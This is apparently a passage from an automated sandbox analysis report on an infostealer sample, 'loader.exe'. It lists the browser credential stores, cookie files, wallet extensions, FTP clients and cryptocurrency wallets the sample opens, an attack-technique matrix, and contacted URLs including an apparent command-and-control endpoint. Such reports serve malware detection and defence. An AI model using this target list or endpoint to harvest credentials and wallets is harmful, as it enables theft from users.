        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: C:\Users\user\Desktop\loader.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
        Source: Yara matchFile source: Process Memory Space: loader.exe PID: 7372, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: loader.exe PID: 7372, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Windows Management Instrumentation
        1
        DLL Side-Loading
        211
        Process Injection
        11
        Virtualization/Sandbox Evasion
        2
        OS Credential Dumping
        1
        System Time Discovery
        Remote Services1
        Screen Capture
        21
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        211
        Process Injection
        LSASS Memory141
        Security Software Discovery
        Remote Desktop Protocol1
        Archive Collected Data
        2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information
        Security Account Manager11
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares31
        Data from Local System
        113
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
        Obfuscated Files or Information
        NTDS1
        Process Discovery
        Distributed Component Object Model2
        Clipboard Data
        Protocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing
        LSA Secrets11
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials33
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        loader.exe47%ReversingLabsWin32.Trojan.Generic
        loader.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://property-imper.sbs/apin0%Avira URL Cloudsafe
        https://property-imper.sbs/apik0%Avira URL Cloudsafe
        https://property-imper.sbs/%j0%Avira URL Cloudsafe
        https://property-imper.sbs/-0%Avira URL Cloudsafe
        https://property-imper.sbs:443/apitPK0%Avira URL Cloudsafe
        https://property-imper.sbs/i0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        property-imper.sbs
        172.67.162.84
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://property-imper.sbs/apifalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabloader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://duckduckgo.com/ac/?q=loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://property-imper.sbs:443/apiloader.exe, 00000005.00000003.1863948333.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002D9C000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgloader.exe, 00000005.00000003.1755502043.00000000055C9000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoloader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://property-imper.sbs/apikloader.exe, 00000005.00000002.1864978713.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1819458912.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://property-imper.sbs/apinloader.exe, 00000005.00000003.1863948333.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.loader.exe, 00000005.00000003.1755502043.00000000055C9000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crl.rootca1.amazontrust.com/rootca1.crl0loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://property-imper.sbs/%jloader.exe, 00000005.00000003.1863948333.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002DC9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://ocsp.rootca1.amazontrust.com0:loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016loader.exe, 00000005.00000003.1709492713.0000000005663000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709558120.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709637829.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1731588987.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1731353744.0000000005617000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17loader.exe, 00000005.00000003.1709492713.0000000005663000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709558120.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709637829.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1731588987.0000000005617000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1731353744.0000000005617000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://www.ecosia.org/newtab/loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://property-imper.sbs/loader.exe, 00000005.00000003.1779722001.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1863948333.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864978713.0000000002E4C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1800680835.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1819458912.0000000002E4C000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1805380680.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://property-imper.sbs/-loader.exe, 00000005.00000003.1863948333.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, loader.exe, 00000005.00000002.1864558893.0000000002DC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brloader.exe, 00000005.00000003.1755131727.00000000056E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://property-imper.sbs/iloader.exe, 00000005.00000003.1819458912.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://ac.ecosia.org/autocomplete?q=loader.exe, 00000005.00000003.1709108207.0000000005609000.00000004.00000800.00020000.00000000.sdmp, loader.exe, 00000005.00000003.1709047142.000000000560B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiloader.exe, 00000005.00000003.1755502043.00000000055C9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.c.lencr.org/0loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0loader.exe, 00000005.00000003.1753409010.00000000055F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installloader.exe, 00000005.00000003.1709558120.00000000055F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
